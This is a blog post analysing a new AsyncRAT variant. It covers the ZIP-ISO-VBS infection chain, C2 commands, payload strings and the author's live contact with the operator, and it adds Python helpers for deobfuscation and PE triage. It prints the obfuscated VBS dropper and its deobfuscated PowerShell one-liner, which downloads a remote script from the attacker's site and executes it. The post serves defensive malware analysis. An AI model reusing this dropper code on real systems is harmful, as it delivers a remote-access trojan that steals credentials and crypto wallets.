New AsyncRAT Variation Malware Analysis
References:
Artifacts can be found here: https://git.landon.pw/r/malware-analysis/tree/main/async-rat
Background
During an incident investigation, we uncovered a new variation of the AsyncRAT threat campaign. This follows closely with MorphieSec's analysis, but there are some differences to be noted.
Original Email Link: hxxp://webmail.spectrum.net/index.php/mail/viewmessage/getattachment/uniqueId/137694/account/0/filenameOriginal/ZXNHUCET67WGFYUH23HJ32F32.zip/filenameModified/ZXNHUCET67WGFYUH23HJ32F32.zip?folder=SU5CT1g%253D
The email link downloads zxnhucet67wgfyuh23hj32f32.zip. It is a ZIP archive containing an ISO disk image with the same name as the zip: ZXNHUCET67WGFYUH23HJ32F32.iso. Once mounted, the disk image contains PZKFEUUD76631.vbs.
Dropper Analysis
The malware starts at the PZKFEUUD76631.vbs. The VBS script employs basic obfuscation to call PowerShell, which downloads the contents of hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/xx.txt and executes it.
GFEIIPQN = ("t.S")
RZJIXQMY = ("p"+GFEIIPQN+"h")
QGKTYAJN = ("ri"+RZJIXQMY+"el")
YQKXLMIK = ("Sc")
Set JLVWAYWB = CreateObject("W"+YQKXLMIK+QGKTYAJN+"l")
WQRUDORK = "m"
YKPMWRKW = "po"
ZSNVRCYD = "el"
IPHJRZXC = "sh"
XTDPCXDY = "l -Co"
TLSQCTOM = "wer"
EWCOIBQW = "man"
SYFBMBZE = "d [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.Visua"
RBHSUTBB = "lBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,"
YCAFQCOE = "'__#$_____!___'.Replace('__#$__','http://hennhaus.co').Replace('___!___','m/wp-includes/images/wlw/pomo/wo/xx.txt'))|IE"
BMUYOXSY = "X;[Byte[]]"
JLVWAYWB.Run YKPMWRKW+TLSQCTOM+IPHJRZXC+ZSNVRCYD+XTDPCXDY+WQRUDORK+EWCOIBQW+SYFBMBZE+RBHSUTBB+YCAFQCOE+BMUYOXSY,0
# Deobfuscated
Set JLVWAYWB = CreateObject("Wscript.Shell")
JLVWAYWB.Run powershell -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/xx.txt')|IEX;[Byte[]], 0
The downloaded script creates persistence. It creates a few files:
img.ps1 - From hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/1.txt
xx.bat - Creates a scheduled task to run img.vbs
img.vbs - Runs img.bat
img.bat - Executes the img.ps1 PowerShell script
xx.vbs - Runs xx.bat
All of these files are stored in the C:\ProgramData\img\ISO directory.
So all-in-all, the action flow is as follows: zip -> iso -> vbs -> xx.vbs -> xx.bat -> img.vbs -> img.bat -> img.ps1
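As an added example (not code from the original post), a small Python deobfuscator that replays the two tricks the dropper relies on: VBS string concatenation through throwaway variables, and PowerShell .replace() chains that rebuild 'DownloadString' and the download URL at run time. The embedded sample is the dropper listed above, with the URL scheme defanged to hxxp:// as in the post's own deobfuscated listing.

```python
import re

# The PZKFEUUD76631.vbs dropper listed above, embedded as the sample input; the
# 'http://' in its URL fragment is defanged to 'hxxp://' as in the post's own listing.
DROPPER = r'''
GFEIIPQN = ("t.S")
RZJIXQMY = ("p"+GFEIIPQN+"h")
QGKTYAJN = ("ri"+RZJIXQMY+"el")
YQKXLMIK = ("Sc")
Set JLVWAYWB = CreateObject("W"+YQKXLMIK+QGKTYAJN+"l")
WQRUDORK = "m"
YKPMWRKW = "po"
ZSNVRCYD = "el"
IPHJRZXC = "sh"
XTDPCXDY = "l -Co"
TLSQCTOM = "wer"
EWCOIBQW = "man"
SYFBMBZE = "d [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.Visua"
RBHSUTBB = "lBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,"
YCAFQCOE = "'__#$_____!___'.Replace('__#$__','hxxp://hennhaus.co').Replace('___!___','m/wp-includes/images/wlw/pomo/wo/xx.txt'))|IE"
BMUYOXSY = "X;[Byte[]]"
JLVWAYWB.Run YKPMWRKW+TLSQCTOM+IPHJRZXC+ZSNVRCYD+XTDPCXDY+WQRUDORK+EWCOIBQW+SYFBMBZE+RBHSUTBB+YCAFQCOE+BMUYOXSY,0
'''
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')          # NAME = <expr>; "Set x = ..." does not match
TOKEN = re.compile(r'"([^"]*)"|(\w+)')                      # a "literal" or a variable name
RUN = re.compile(r'^\s*\w+\.Run\s+(.+?),\s*\d+\s*$', re.M)  # <shell>.Run <expr>,<window style>
CHAIN = re.compile(r"'([^']*)'((?:\.replace\('[^']*','[^']*'\))+)", re.I)
STEP = re.compile(r"\.replace\('([^']*)','([^']*)'\)", re.I)

def parse_vars(src):
    """Map each VBS variable to its (still unevaluated) right-hand expression."""
    return {m.group(1): m.group(2) for m in map(ASSIGN.match, src.splitlines()) if m}

def resolve(expr, env):
    """Evaluate a '+' concatenation: keep literals, recursively expand known variables."""
    return ''.join(resolve(env[name], env) if name in env else lit
                   for lit, name in TOKEN.findall(expr))

def fold_replace_chains(ps):
    """Collapse PowerShell 'lit'.replace(a,b).replace(c,d)... into the final literal."""
    def fold(m):
        val = m.group(1)
        for old, new in STEP.findall(m.group(2)):
            val = val.replace(old, new)
        return f"'{val}'"
    return CHAIN.sub(fold, ps)

def deobfuscate(src):
    """Recover the command line the dropper hands to WScript.Shell.Run."""
    return fold_replace_chains(resolve(RUN.search(src).group(1), parse_vars(src)))
```

Running deobfuscate(DROPPER) yields the same PowerShell one-liner as the deobfuscated listing above, which is a quick way to confirm a variant before detonating anything.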
img.ps1 does a couple of things to initiate the malicious payload. It first declares a few variables:
Then, it grabs the HWID and AV product of the machine.
Next, it sends information about the machine to the mo1010.duckdns.org:4000 web server. It packs all of the information: HWID, AV, OS, computer name, and username, and passes it as a User-Agent in the request header.
Depending on the response to the request, there are twelve commands the PowerShell script can run. The script splits the response and uses the first element of the array as the command.
Here are the commands and what they do:
"close": Stops the script
"restart": Stops the script and re-opens it
"UNS": Stops the script and deletes it (uninstall)
"DW": Writes bytes to a file in the temp folder
"exc": Downloads a file to the temp folder
"memory": Loads an assembly into the application domain
"bot": Invokes the BotKiller class from the reflected PE
"PE": Invokes the SendtoMemory class from the reflected PE
"vurl": Runs the second argument of the response
"hurl": Navigates to a website via Internet Explorer in an invisible window
"shellfuc": Similar to vurl, except with a hidden window
"Note": Writes to the registry key HKEY_CURRENT_USER\SOFTWARE\<hwid>\Note
These are guesses on the usage, as there is no way to be sure without seeing the request response. Either the "DW" or "exc" command causes the final stage of the malware to be dropped on the machine. It downloads 1.ps1 to %appdata%\Local\Temp.
Payload Analysis
1.ps1 contains two helper functions, Binary2String and HexaToByte. These functions are used to decode two strings, $serv and $DATA:
I wrote a small Python script to convert the bytes into a file, and ran file RF5X and file TyXC3 to determine the file types of the payloads.
I began some basic PE analysis of the two files. I used XPEViewer to look at the version info (specifically, StringFileInfo.OriginalFilename) and found that RF5X is Stub.exe and TyXC3 is runpe.dll. Further analysis of runpe.dll shows it is packed with ConfuserEx, an open-source PE obfuscator and packer. runpe.dll uses the RunPE process hollowing technique to start an aspnet_compiler.exe process and inject the payload (Stub.exe) into it.
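As an added example (not the author's own script), a Python analogue of the bytes-to-file step: stand-ins for the two 1.ps1 helpers, whose input formats are assumed here (8-bit groups for Binary2String, a hex string for HexaToByte), plus a "file"-style check that tells a native PE from a .NET assembly, which is the relevant question for a ConfuserEx-packed DLL since ConfuserEx only protects .NET assemblies. The test image is constructed, not taken from the sample.

```python
import struct

# Analogues of the two helpers named in 1.ps1. Their input formats are an assumption:
# Binary2String is read as space-separated 8-bit groups, HexaToByte as a hex string.
def binary_to_string(bits: str) -> str:
    return ''.join(chr(int(group, 2)) for group in bits.split())

def hex_to_bytes(hexstr: str) -> bytes:
    return bytes.fromhex(''.join(hexstr.split()))

def identify_pe(blob: bytes) -> str:
    """A 'file'-style verdict: MZ/PE signatures, PE32 vs PE32+, and whether the CLR
    runtime header (data directory 14) is present, which marks a .NET assembly."""
    if len(blob) < 0x40 or blob[:2] != b'MZ':
        return 'not a DOS/PE image'
    pe = struct.unpack_from('<I', blob, 0x3C)[0]            # e_lfanew
    if blob[pe:pe + 4] != b'PE\0\0':
        return 'MZ stub without PE signature'
    opt = pe + 24                                            # 4-byte signature + 20-byte COFF header
    if len(blob) < opt + 2:
        return 'PE header truncated'
    magic = struct.unpack_from('<H', blob, opt)[0]
    if magic not in (0x10B, 0x20B):
        return 'PE with unrecognised optional header'
    kind = 'PE32' if magic == 0x10B else 'PE32+'
    dirs = opt + (96 if magic == 0x10B else 112)            # start of the data directory table
    if len(blob) < dirs + 15 * 8:
        return f'{kind}, truncated header'
    clr_rva = struct.unpack_from('<I', blob, dirs + 14 * 8)[0]
    return f"{kind} {'.NET assembly' if clr_rva else 'native executable'}"

def write_payload(blob: bytes, path: str) -> str:
    """Write a decoded payload to disk and return its triage verdict."""
    with open(path, 'wb') as fh:
        fh.write(blob)
    return identify_pe(blob)

def make_test_image(dotnet: bool) -> bytes:
    """Constructed minimal PE32 header (not a real sample) for exercising identify_pe()."""
    img = bytearray(0x58 + 96 + 16 * 8)
    img[:2] = b'MZ'
    struct.pack_into('<I', img, 0x3C, 0x40)                  # e_lfanew -> 0x40
    img[0x40:0x44] = b'PE\0\0'
    struct.pack_into('<H', img, 0x58, 0x10B)                 # PE32 optional-header magic
    if dotnet:
        struct.pack_into('<II', img, 0x58 + 96 + 14 * 8, 0x2008, 0x48)  # CLR header RVA, size
    return bytes(img)
```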
Manalyzer catches some interesting behavior about Stub.exe. There are checks for VMWare and Sandboxie present. Some other references that are interesting that Manalyzer missed that I discovered through static analysis:
System.Collections.IEnumerable.GetEnumerator - Possibly to enumerate all files (i.e. ransomware capabilities)
Google Chrome "MetaMask" extension
Exodus Wallet
exodus.conf.json
Bitcoin
settings.json
Atomic cookies
Bitcoin Core
VirtualBox check
AES, MD5
CryptoServiceProvider
Task Scheduler
Select * from AntivirusProduct
AnyDesk
Offkeylogger
asynclogs.txt
"masterKey"
sendPlugin, savePlugin
XPEViewer "Strings"
From just looking at the strings, there is a pretty clear idea of what this malware does. There are a few references to crypto wallets: Exodus, MetaMask, and Atomic, and their relevant configuration files, so probably a crypto stealer feature. There is also a reference to "AnyDesk" and "Offkeylogger", so remote viewing is probably provided by AnyDesk along with the ability to log keystrokes. There are also multiple references to cryptography: AES and MD5 CryptoServiceProvider as well as a "master key". This indicates a high likelihood that the malware has ransomware capabilities.
Further, there is also a reference to a scheduled task via /c schtasks /create /f /sc onlogon /rl highest /tn " which references the registry location: Software\Microsoft\Windows\CurrentVersion\Run. This is to create persistence and run the malware at login.
Dynamic testing of the malware confirms these suspicions. When run, multiple dialog boxes opened, and the threat actor asked "What are you working on" as well as "Are you from Paris or London?". Eventually, they prompted me to add them on Telegram or ICQ, and I added them on Telegram. They operate under the handle @BusinessIsLife. After a while of talking on Telegram, the threat actor began to delete and rename files on the VM. It was actually a pretty cool experience to communicate with the threat actor during the analysis.

Nevertheless, the dynamic testing proved the malware's ability to interact with the host, proving its capabilities as a RAT. Based on the testing and information available at this time, it seems the malware is a variant of the AsyncRAT family, with the ability to steal crypto wallets. Another possibly related malware is the njRAT LIME variant. During investigation of runpe.dll, I discovered a YouTube video, "RunPe Dll In C# By neutron", and at 4:23 there are references to njRAT.exe and Stub.manifest, which could possibly link to Stub.exe.
That's all for the analysis of this malware. Thanks for reading, and I hope the information provided was clear and succinct, yet informative. Feel free to connect with me on my socials, I plan to continue the malware analysis and will post updates there:
LinkedIn: https://linkedin.com/in/landoncrabtree